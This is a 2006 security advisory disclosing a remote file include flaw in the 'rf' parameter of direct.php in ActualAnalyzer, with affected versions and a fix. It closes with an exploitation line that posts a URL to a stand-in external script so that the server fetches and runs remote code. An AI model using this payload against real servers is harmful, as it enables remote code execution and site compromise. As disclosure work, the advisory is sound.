[MajorSecurity]ActualAnalyzer - Remote File Include Vulnerability ----------------------------------------------------------- Software: ActualAnalyzer Type: Remote File Include Vulnerability Date: April, 19th 2006 Vendor: ActualScripts Page: http://actualscripts.com Risc: High Credits: ---------------------------- Discovered by: 'Aesthetico' http://www.majorsecurity.de Affected Products: ---------------------------- ActualAnalyzer Lite 2.72 and prior ActualAnalyzer Gold 7.63 and prior ActualAnalyzer Server 8.23 and prior Description: ---------------------------- ActualAnalyzer is a powerful statistics-gathering and analysis tool for monitoring web site traffic. It is equally effective for sites with low and high volumes of traffic and provides a wealth of comparative and analytical information. High performance is achieved by using a MySQL database. Requirements: ---------------------------- register_globals = On Vulnerability: ---------------------------- Input passed to the "rf" parameter in "direct.php" is not properly verified, before it is used to include files. This can be exploited to include arbitrary files from external resources. Solution: ---------------------------- Edit the source code to ensure that input is properly sanitised. Set "register_globals" to "Off". Exploitation: ---------------------------- Post data: rf=http://www.yourspace.com/yourscript.php?